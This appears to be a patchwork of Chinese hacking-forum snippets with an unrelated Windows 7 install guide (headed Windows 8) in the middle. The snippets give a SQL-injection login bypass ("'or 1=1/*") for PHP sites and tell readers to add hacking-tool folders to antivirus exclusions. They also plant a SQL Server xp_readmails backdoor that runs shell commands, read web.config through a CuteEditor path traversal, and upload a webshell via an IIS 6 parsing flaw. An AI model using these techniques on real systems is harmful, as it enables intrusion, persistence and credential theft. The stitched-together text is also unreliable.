如果你用这样的万能密码‘or’='or’，当然进不去，理由是GPC开启的时候单引号会被转换。

PHP注入时我常用的万能密码是：‘or 1=1/*.

那我们分析一下为什么这可以进后台。

如果sql语句这样写：“SELECT * FROM admin where name=’”.$_POST['name'].“‘andpassword=’”.$_POST['password'].“‘”,那我们在帐号处输入万能密码’or 1=1/*，密码随便输，sql语句就成了select * from admin where name=”or 1=1/*’ and password=’任意字符‘。

/*为mysql的注释符，这样后面的东西就都被注释掉了，也就是为什么密码随便输的原因。假设GPC转换没有开启，那么请看：where name=”or 1=1（*/后面的东西被注释掉了），name=’’的逻辑值为假，而后面的1=1逻辑值则为真，对于整体就成了假 or 真，最终的逻辑值还是真，就进后台了。

那么如果GPC转换开启了，就对单引号进行了转换。语句就变成了where name=’\'or 1=1,再看一下和刚才有什么区别，无非是多了个\。name=’\‘与name=’’的逻辑值一样，都为假，那1=1为真，总的sql语句的逻辑值不还是真吗？那有进不去后台的理由吗？

所以总的来说，php网站的万能密码可以这样写：‘or 1=1/*，而GPC转换是否开启对它没有任何影响！

所以请改变你的想法：存在字符型注入的php网站是可以用万能密码’or 1=1/*的

装好后，电脑上有很多文件都是黑软的东东，都会报毒的，于是设置下信任文件。在小红伞的专家模式下。

【扫描-例外】和【Guard-例外】里均添加外挂所在文件夹

论坛中有人发过硬盘安装windows8的帖子，忘了他叫什么，本人学习了他的精华，个别地方有小改动，安装成功，在这里感谢他。

1.把WINDOWS7的ISO镜像解压到D:\windows7\。
2.进入PE，格式化C盘为NTFS。
3.从D:\windows7\提取boot和bootmgr这两个文件到C盘根目录。再从D:\windows7\sources提取boot.wim和 install.wim这两个文件到C:\sources。
4.在PE中运行cmd，输入下面一行后回车
c:\boot\bootsect.exe /nt60 c:
然后重起电脑。
5.出现安装界面，不要点现在安装，点左下角“repairing computer”进入系统恢复选项，选最后 一项“command prompt”，进入DOS窗口。
6.进入DOS后，输入D:\windows7\sources\setup.exe，回车，进入系统的正常安装，选安装位置时记得要格式化C盘。
其他windows系统也可以按照这个方法来装的，省资源啊！^_^

1、以SA连接SQL Server 执行
copy xp_readmails.dll c:\wmpub\xp_readmails.dll
USE master //要根据具体情况来确定当前数据库
dbcc addextendedproc(‘xp_readmails’,'c:\wmpub\xp_readmails.dll’);
grant exec on xp_readmails to public; //将执行权限给所有用户

提示成功过后，调用:
exec xp_readmails ‘ver >c:\test11.txt’;

2、exec master..sp_dropextendedproc ‘xp_readmails’; //删除指定的扩展存储过程xp_readmails
SQL扩展存储后门

方法1.直接下载load.ashx配置文件

http://www.xxxx.cn/CuteSoft_Client/CuteEditor/Load.ashx?type=image&file=../../../web.config

然后查看一些sql配置信息 从sql数据库连接入手

方法2.2003 iis解析(后台拿webshell)

填加新闻–上传音乐，视频等图标—新建目录xx.asp 然后上传小马x.avi

图片方面因为格式检查严格~！不成功~求突破。